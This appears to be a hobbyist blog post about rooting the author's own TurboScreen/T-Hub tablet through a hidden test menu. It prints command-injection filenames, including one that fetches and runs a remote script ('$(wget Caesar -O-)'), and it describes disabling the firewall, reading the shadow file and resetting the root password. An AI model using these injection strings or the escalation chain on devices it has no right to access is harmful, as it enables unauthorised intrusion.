Today I acquired another TurboScreen, and instead of diving headlong into serious software and hardware hacks again, I decided to have another look at the Hidden Menu.
Like most test software, the menu isn't designed for consumer use. It has bugs, crashes, is ugly and some parts just plain old don't work. It has all the hallmarks of having been put together in a real hurry. This got me thinking - if Sagem slapped it together for internal use, there's a real chance that they didn't do a great job of making it terribly sane or secure, right? So I started reading through the code.
Two functions caught my eye fairly quickly. One is the firmware update utility, which does a fairly poor regex against the file list on a usb stick to look for firmware it recognises. For instance, it'll happily swallow a file I named "001.001.001.bin;reboot" and reboots just as one would expect. This looked very promising for getting root access, but there's one serious issue - the command strips out all the spaces from the filename, so you can forget trying to pass any arguments. Dead end.
The second function is used in the testing of USB storage devices. It simply plays an audio file from a USB flash drive through the speakers. The restriction on this is that the filename must end in .wav, and like the firmware update function it does not do any sanitisation of the string. It even leaves the spaces in.
Given that my input is in the form of a filename, I am prevented from using characters like pipes and slashes in my command. Initially this looked to be a bit of an issue, but it isn't. I recruited my friendly neighbourhood domain controller and fileserver, Caesar, and installed IIS on it. Then I stuck the real command I wanted to run into the index.html. By adjusting the filename to look something like this:
"test; $(wget Caesar -O-); .wav"
I was able to cause the T-Hub to download the command list from Caesar and then execute it. As root. By doing it this way I get around all character limitations.
Getting close now.
The first command I tried, having seen that the system has iptables installed, was this
"iptables -I INPUT -j ACCEPT"
Which effectively disabled the firewall around my tablet. I was then able to see an SSH server, but I still had no credentials. The next thing I did (after figuring out that the usb stick mounts itself as RO on the tablet) was to grab the shadow file from the device and copy it onto the usb stick. On examination, I discovered the user/pass combination user:user, which got me into SSH, albeit as an unprivileged user.
I had previously tried to overwrite the shadow file, but it had been failing silently, which I suspected was because the root filesystem was read only. Now that I had a session, I was able to quickly confirm this. I crafted another command that would remount the UBIFS rootfs with write permission and then set shadow to have global write permissions. Once this was done, I adjusted the root password to a known value and connected to SSH again. I had root!
For finishing touches, I went into the iptables_start.sh script and created an exception for the SSH server. This means that I can now connect to SSH as root without having to do any command injection trickery.
This box is mine.